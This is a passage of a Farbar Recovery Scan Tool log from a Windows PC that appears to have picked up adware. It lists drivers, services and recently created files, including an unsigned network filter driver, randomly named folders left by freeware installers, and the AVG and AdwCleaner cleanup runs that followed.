R2 NVDisplay.ContainerLocalSystem; C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_90685a092bcf58c7\Display.NvContainer\NVDisplay.Container.exe -s NVDisplay.ContainerLocalSystem -f %ProgramData%\NVDisplay.ContainerLocalSystem.log -l 3 -d C:\WINDOWS\System32\DriverStore\FileRepository\nv_dispi.inf_amd64_90685a092bcf58c7\Display.NvContainer\plugins\LocalSystem -r -p 30000 -cfg NVDisplay.ContainerLocalSystem\LocalSystem

===================== Drivers (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R1 0246CDED558E; C:\WINDOWS\0246CDED558E.sys [25368 2020-08-29] (大连纵梦网络科技有限公司 -> FsFilter Network) [File not signed]
R0 avgArDisk; C:\WINDOWS\System32\drivers\avgArDisk.sys [37208 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgArPot; C:\WINDOWS\System32\drivers\avgArPot.sys [205952 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgbidsdriver; C:\WINDOWS\System32\drivers\avgbidsdriver.sys [235656 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgbidsh; C:\WINDOWS\System32\drivers\avgbidsh.sys [195720 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgbuniv; C:\WINDOWS\System32\drivers\avgbuniv.sys [61064 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgElam; C:\WINDOWS\System32\drivers\avgElam.sys [16320 2020-08-29] (Microsoft Windows Early Launch Anti-malware Publisher -> AVG Technologies CZ, s.r.o.)
R1 avgKbd; C:\WINDOWS\System32\drivers\avgKbd.sys [42840 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R2 avgMonFlt; C:\WINDOWS\System32\drivers\avgMonFlt.sys [175264 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgNetHub; C:\WINDOWS\System32\drivers\avgNetHub.sys [515600 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgRdr; C:\WINDOWS\System32\drivers\avgRdr2.sys [109336 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgRvrt; C:\WINDOWS\System32\drivers\avgRvrt.sys [84912 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgSnx; C:\WINDOWS\System32\drivers\avgSnx.sys [851664 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R1 avgSP; C:\WINDOWS\System32\drivers\avgSP.sys [466816 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R2 avgStm; C:\WINDOWS\System32\drivers\avgStm.sys [217392 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
R0 avgVmm; C:\WINDOWS\System32\drivers\avgVmm.sys [323848 2020-08-29] (AVG Technologies USA, LLC -> AVG Technologies CZ, s.r.o.)
S3 BthA2dp; C:\WINDOWS\System32\drivers\BthA2dp.sys [231936 2020-01-09] (Microsoft Corporation) [File not signed]
R3 dtultrascsibus; C:\WINDOWS\System32\drivers\dtultrascsibus.sys [42256 2020-03-21] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R3 dtultrausbbus; C:\WINDOWS\System32\drivers\dtultrausbbus.sys [59344 2020-03-21] (AVB Disc Soft, SIA -> Disc Soft Ltd)
R2 speedfan; C:\WINDOWS\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
S0 WdBoot; C:\WINDOWS\System32\drivers\wd\WdBoot.sys [78216 2020-08-05] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
R0 WdFilter; C:\WINDOWS\System32\drivers\wd\WdFilter.sys [430320 2020-08-05] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\drivers\wd\WdNisDrv.sys [98520 2020-08-05] (Microsoft Windows -> Microsoft Corporation)

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One month (created) ===================

(If an entry is included in the fixlist, the file/folder will be moved.)

2020-09-11 16:31 - 2020-09-11 16:34 - 000000000 ____D C:\AdwCleaner
2020-09-11 16:30 - 2020-09-11 16:30 - 008414384 _____ (Malwarebytes) C:\Users\Milan\Desktop\AdwCleaner.exe
2020-09-11 14:30 - 2020-09-11 14:32 - 000038177 _____ C:\Users\Milan\Desktop\Addition.txt
2020-09-11 14:27 - 2020-09-11 18:09 - 000086036 _____ C:\Users\Milan\Desktop\FRST.txt
2020-09-11 14:27 - 2020-09-11 18:09 - 000000000 ____D C:\FRST
2020-09-11 14:27 - 2020-09-11 14:27 - 000000000 _____ C:\Users\Milan\Desktop\Nový textový dokument.txt
2020-09-11 14:24 - 2020-09-11 14:25 - 002297344 _____ (Farbar) C:\Users\Milan\Desktop\FRST64.exe
2020-09-09 07:11 - 2020-09-09 07:11 - 000000000 ____D C:\Users\Milan\AppData\Local\CrashDumps
2020-09-09 07:03 - 2020-09-09 07:03 - 001728079 _____ C:\Users\Milan\Downloads\pz_II_c_87_01.rar
2020-09-06 14:21 - 2020-09-06 15:02 - 733129592 _____ C:\Users\Milan\Downloads\Šifra mistra Leonarda super film cz dabing dvdrip.avi
2020-09-06 12:20 - 2020-09-06 13:13 - 932525132 _____ C:\Users\Milan\Downloads\Apocalipto.avi
2020-09-02 20:01 - 2020-09-02 20:01 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2020-09-02 15:58 - 2020-09-02 20:04 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-08-30 12:28 - 2020-08-30 14:19 - 1992979015 _____ C:\Users\Milan\Downloads\The.Debt.Collectors.2.2020.PROPER.1080p.WEBRip.x264-RARBG.mp4
2020-08-29 22:45 - 2020-09-10 15:06 - 000002375 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG Secure Browser.lnk
2020-08-29 22:45 - 2020-09-10 15:06 - 000002340 _____ C:\Users\Public\Desktop\AVG Secure Browser.lnk
2020-08-29 22:45 - 2020-08-29 22:45 - 000003826 _____ C:\WINDOWS\system32\Tasks\AVG Secure Browser Heartbeat Task (Hourly)
2020-08-29 22:45 - 2020-08-29 22:45 - 000003242 _____ C:\WINDOWS\system32\Tasks\AVG Secure Browser Heartbeat Task (Logon)
2020-08-29 22:41 - 2020-08-29 22:41 - 000003468 _____ C:\WINDOWS\system32\Tasks\AVGUpdateTaskMachineUA
2020-08-29 22:41 - 2020-08-29 22:41 - 000003344 _____ C:\WINDOWS\system32\Tasks\AVGUpdateTaskMachineCore
2020-08-29 22:41 - 2020-08-29 22:41 - 000000000 ___HD C:\$AV_AVG
2020-08-29 22:41 - 2020-08-29 22:41 - 000000000 ____D C:\Program Files (x86)\AVG
2020-08-29 22:40 - 2020-08-29 22:45 - 000000000 ____D C:\Users\Milan\AppData\Local\Avg
2020-08-29 22:40 - 2020-08-29 22:40 - 000002075 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG AntiVirus FREE.lnk
2020-08-29 22:40 - 2020-08-29 22:40 - 000002063 _____ C:\Users\Public\Desktop\AVG AntiVirus FREE.lnk
2020-08-29 22:40 - 2020-08-29 22:40 - 000000000 ____D C:\Users\Milan\AppData\Roaming\AVG
2020-08-29 22:40 - 2020-08-29 22:40 - 000000000 ____D C:\Users\Milan\AppData\Local\CEF
2020-08-29 22:39 - 2020-09-02 14:57 - 000004266 _____ C:\WINDOWS\system32\Tasks\Antivirus Emergency Update
2020-08-29 22:39 - 2020-08-29 22:39 - 000000000 ____D C:\WINDOWS\system32\Tasks\AVG
2020-08-29 22:38 - 2020-08-29 22:39 - 000323848 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgVmm.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000851664 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgSnx.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000515600 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgNetHub.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000466816 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgSP.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000336520 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\avgBoot.exe
2020-08-29 22:38 - 2020-08-29 22:38 - 000235656 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbidsdriver.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000217392 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgStm.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000205952 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgArPot.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000195720 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbidsh.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000175264 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgMonFlt.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000109336 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgRdr2.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000084912 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgRvrt.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000061064 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgbuniv.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000042840 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgKbd.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000037208 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgArDisk.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000016320 _____ (AVG Technologies CZ, s.r.o.) C:\WINDOWS\system32\Drivers\avgElam.sys
2020-08-29 22:38 - 2020-08-29 22:38 - 000000000 ____D C:\Program Files\Common Files\AVG
2020-08-29 22:38 - 2020-08-29 22:38 - 000000000 ____D C:\Program Files\AVG
2020-08-29 22:37 - 2020-09-03 16:57 - 000000000 ____D C:\ProgramData\AVG
2020-08-29 22:37 - 2020-08-29 22:37 - 000271696 _____ (AVG Technologies CZ, s.r.o.) C:\Users\Milan\Downloads\avg_antivirus_free_setup.exe
2020-08-29 18:07 - 2020-08-29 22:38 - 000000000 ____D C:\Users\Milan\AppData\Roaming\3k52z4f5aim
2020-08-29 18:07 - 2020-08-29 22:37 - 000000000 ____D C:\Program Files\M3PY0PHHSX
2020-08-29 17:53 - 2020-08-29 17:53 - 000025368 _____ (FsFilter Network) C:\WINDOWS\0246CDED558E.sys
2020-08-29 17:52 - 2020-09-10 07:43 - 000001039 _____ C:\Users\Milan\Desktop\ScrSnap.lnk
2020-08-29 17:52 - 2020-08-29 17:54 - 000000000 ____D C:\Users\Milan\AppData\Local\ScrSnap
2020-08-29 17:51 - 2020-08-29 17:54 - 000000000 ____D C:\Users\Milan\AppData\Roaming\npy4omvvn5m
2020-08-29 17:50 - 2020-08-29 22:44 - 000000000 ____D C:\Users\Milan\AppData\Roaming\0246cded558e
2020-08-29 17:31 - 2020-09-11 16:34 - 000000000 ____D C:\Users\Milan\AppData\Roaming\Lavasoft
2020-08-29 17:31 - 2020-09-11 16:34 - 000000000 ____D C:\Users\Milan\AppData\Local\Lavasoft
2020-08-29 17:31 - 2020-09-11 16:34 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lavasoft
2020-08-29 17:31 - 2020-09-11 16:34 - 000000000 ____D C:\Program Files (x86)\Lavasoft
2020-08-29 17:30 - 2020-09-11 16:34 - 000000000 ____D C:\ProgramData\Lavasoft
2020-08-29 17:30 - 2020-08-29 17:31 - 000000000 ____D C:\Users\Milan\AppData\Roaming\oudvj15abkf
2020-08-29 17:29 - 2020-08-29 22:41 - 000000000 ____D C:\Program Files (x86)\oizjd
2020-08-29 17:29 - 2020-08-29 17:53 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Direct WAV MP3 Splitter
2020-08-29 17:29 - 2020-08-29 17:53 - 000000000 ____D C:\Program Files (x86)\Direct WAV MP3 Splitter
2020-08-29 17:29 - 2020-08-29 17:34 - 000000000 ____D C:\Program Files (x86)\Convertilla
2020-08-27 23:00 - 2020-08-28 00:46 - 1959706735 _____ C:\Users\Milan\Downloads\Zeme.a.krev-Earth.and.Blood.2020.1080p.WEB.x264.DDP5.1.CZ.TITULKY-FCKR.mkv
2020-08-27 10:12 - 2020-08-27 11:16 - 1141266433 _____ C:\Users\Milan\Downloads\Ghosts.Of.War.2020.titl.ve filmu-kirikos1.mp4
2020-08-26 23:01 - 2020-08-29 16:26 - 000000000 ____D C:\Users\Milan\Desktop\Tanky
2020-08-24 09:09 - 2020-08-15 18:12 - 045761304 _____ C:\Users\Milan\Downloads\Maly_Modelarz_2005-04-06_-_Bismarck.rar
2020-08-15 17:41 - 2020-08-15 17:41 - 000000000 ____D C:\Users\Milan\Desktop\OH-13
2020-08-15 17:32 - 2020-08-15 17:32 - 006094091 _____ C:\Users\Milan\Downloads\Hrad Rokštejn.pdf
2020-08-15 08:34 - 2020-08-15 08:34 - 000000000 ____D C:\Program Files\Microsoft Update Health Tools
2020-08-15 08:34 - 2020-08-10 10:38 - 000436536 _____ (Microsoft Corporation) C:\WINDOWS\system32\QualityUpdateAssistant.dll
2020-08-15 08:34 - 2020-08-10 10:37 - 000905528 _____ (Microsoft Corporation) C:\WINDOWS\system32\sedplugins.dll
2020-08-15 08:06 - 2020-08-15 08:06 - 002510856 _____ (Microsoft Corporation) C:\WINDOWS\system32\mcupdate_GenuineIntel.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 025444352 _____ (Microsoft Corporation) C:\WINDOWS\system32\Hydrogen.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 019852288 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\edgehtml.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 019812352 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramWorld.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 018032128 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 007758848 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakra.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 007270912 _____ (Microsoft Corporation) C:\WINDOWS\system32\ieframe.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 006294528 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ieframe.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 005904896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakra.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 005013504 _____ (Microsoft Corporation) C:\WINDOWS\system32\MFMediaEngine.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 004859904 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 004611072 _____ (Microsoft Corporation) C:\WINDOWS\system32\msi.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 004129408 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfcore.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 003822592 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 003637760 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MFMediaEngine.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 003516416 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msi.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 002950808 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmp4srcsnk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mshtml.tlb
2020-08-12 19:45 - 2020-08-12 19:45 - 002588688 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMVDECOD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 002422384 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMVCORE.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 002259192 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMVDECOD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 002138280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMVCORE.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 001870200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmp4srcsnk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001836160 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfsrcsnk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001610240 _____ (Microsoft Corporation) C:\WINDOWS\system32\HologramCompositor.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001418832 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfsrcsnk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001311744 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msjet40.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001151816 _____ (Microsoft Corporation) C:\WINDOWS\system32\mfmpeg2srcsnk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 001012792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mfmpeg2srcsnk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000971776 _____ (Microsoft Corporation) C:\WINDOWS\system32\dsregcmd.exe
2020-08-12 19:45 - 2020-08-12 19:45 - 000941568 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapi.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000893952 _____ (Microsoft Corporation) C:\WINDOWS\system32\RecoveryDrive.exe
2020-08-12 19:45 - 2020-08-12 19:45 - 000882688 _____ (Microsoft Corporation) C:\WINDOWS\system32\CPFilters.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000843776 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\webplatstorageserver.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000738064 _____ (Microsoft Corporation) C:\WINDOWS\system32\WMADMOD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 000724480 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapi.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000709120 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppReadiness.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000705536 _____ (Microsoft Corporation) C:\WINDOWS\system32\jscript9diag.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000701440 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Mirage.Internal.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000692224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000689152 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\CPFilters.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000669184 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\EdgeManager.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000666280 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\WMADMOD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 000562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\jscript9diag.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000525824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wsecedit.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000475648 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msxbde40.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000432640 _____ (Microsoft Corporation) C:\WINDOWS\system32\WalletService.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000408576 _____ (Microsoft Corporation) C:\WINDOWS\system32\fveapibase.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000359496 _____ (Microsoft Corporation) C:\WINDOWS\system32\MP4SDECD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 000353792 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msrd3x40.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000343408 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\MP4SDECD.DLL
2020-08-12 19:45 - 2020-08-12 19:45 - 000338944 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fveapibase.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000330240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\upnphost.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000309248 _____ (Microsoft Corporation) C:\WINDOWS\system32\tapisrv.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000252928 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\tapisrv.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000227840 _____ (Microsoft Corporation) C:\WINDOWS\system32\IndexedDbLegacy.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000175616 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\IndexedDbLegacy.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000172544 _____ (Microsoft Corporation) C:\WINDOWS\system32\msrahc.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000155136 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakradiag.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000143872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\net1.exe
2020-08-12 19:45 - 2020-08-12 19:45 - 000139776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Chakrathunk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000117248 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakradiag.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000105472 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Chakrathunk.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000088576 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\fdSSDP.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000065536 _____ (Microsoft Corporation) C:\WINDOWS\system32\iemigplugin.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000063488 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iemigplugin.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000058368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\udhisapi.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000035328 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\upnpcont.exe
2020-08-12 19:45 - 2020-08-12 19:45 - 000032256 _____ (Microsoft Corporation) C:\WINDOWS\system32\msisip.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msimsg.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\msimsg.dll
2020-08-12 19:45 - 2020-08-12 19:45 - 000025600 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\msisip.dll
2020-08-12 19:44 - 2020-08-12 19:45 - 022642688 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 025903104 _____ (Microsoft Corporation) C:\WINDOWS\system32\edgehtml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 017792512 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.UI.Xaml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 014820352 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.UI.Xaml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 009932088 _____ (Microsoft Corporation) C:\WINDOWS\system32\ntoskrnl.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 007915864 _____ (Microsoft Corporation) C:\WINDOWS\system32\windows.storage.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 007850784 _____ (Microsoft Corporation) C:\WINDOWS\system32\OneCoreUAPCommonProxyStub.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 007604584 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Media.Protection.PlayReady.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 007583272 _____ (Microsoft Corporation) C:\WINDOWS\system32\d3d10warp.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 007297536 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.Data.Pdf.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 007270728 _____ (Microsoft Corporation) C:\WINDOWS\system32\shell32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 006526448 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Media.Protection.PlayReady.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 006436864 _____ (Microsoft Corporation) C:\WINDOWS\system32\twinui.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 006074552 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\windows.storage.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005946368 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.Data.Pdf.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005849872 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\d3d10warp.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005767224 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\shell32.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005283776 _____ (Microsoft Corporation) C:\WINDOWS\system32\Windows.StateRepository.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005111296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\twinui.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 005003824 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\Windows.StateRepository.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 004625184 _____ (Microsoft Corporation) C:\WINDOWS\explorer.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 004565248 _____ (Microsoft Corporation) C:\WINDOWS\system32\sppsvc.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 004227116 _____ C:\WINDOWS\system32\DefaultHrtfs.bin
2020-08-12 19:44 - 2020-08-12 19:44 - 004005376 _____ (Microsoft Corporation) C:\WINDOWS\system32\EdgeContent.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003974376 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\explorer.exe
2020-08-12 19:44 - 2020-08-12 19:44 - 003806208 _____ (Microsoft Corporation) C:\WINDOWS\system32\diagtrack.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003743056 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\OneCoreUAPCommonProxyStub.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003727872 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kfull.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 003712000 _____ (Microsoft Corporation) C:\WINDOWS\system32\AppXDeploymentServer.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003581240 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\dxgkrnl.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 003368616 _____ (Microsoft Corporation) C:\WINDOWS\system32\combase.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003141632 _____ (Microsoft Corporation) C:\WINDOWS\system32\directml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 003084800 _____ (Microsoft Corporation) C:\WINDOWS\system32\DWrite.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002986808 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\tcpip.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 002808832 _____ (Microsoft Corporation) C:\WINDOWS\system32\WsmSvc.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002799104 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\win32kfull.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 002766952 _____ (Microsoft Corporation) C:\WINDOWS\system32\KernelBase.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002755584 _____ (Microsoft Corporation) C:\WINDOWS\system32\mshtml.tlb
2020-08-12 19:44 - 2020-08-12 19:44 - 002739200 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\directml.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002737664 _____ (Microsoft Corporation) C:\WINDOWS\system32\WebRuntimeManager.dll
2020-08-12 19:44 - 2020-08-12 19:44 - 002717696 _____ (Microsoft Corporation) C:\WINDOWS\system32\win32kbase.sys
2020-08-12 19:44 - 2020-08-12 19:44 - 002698048 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\ntfs.sys
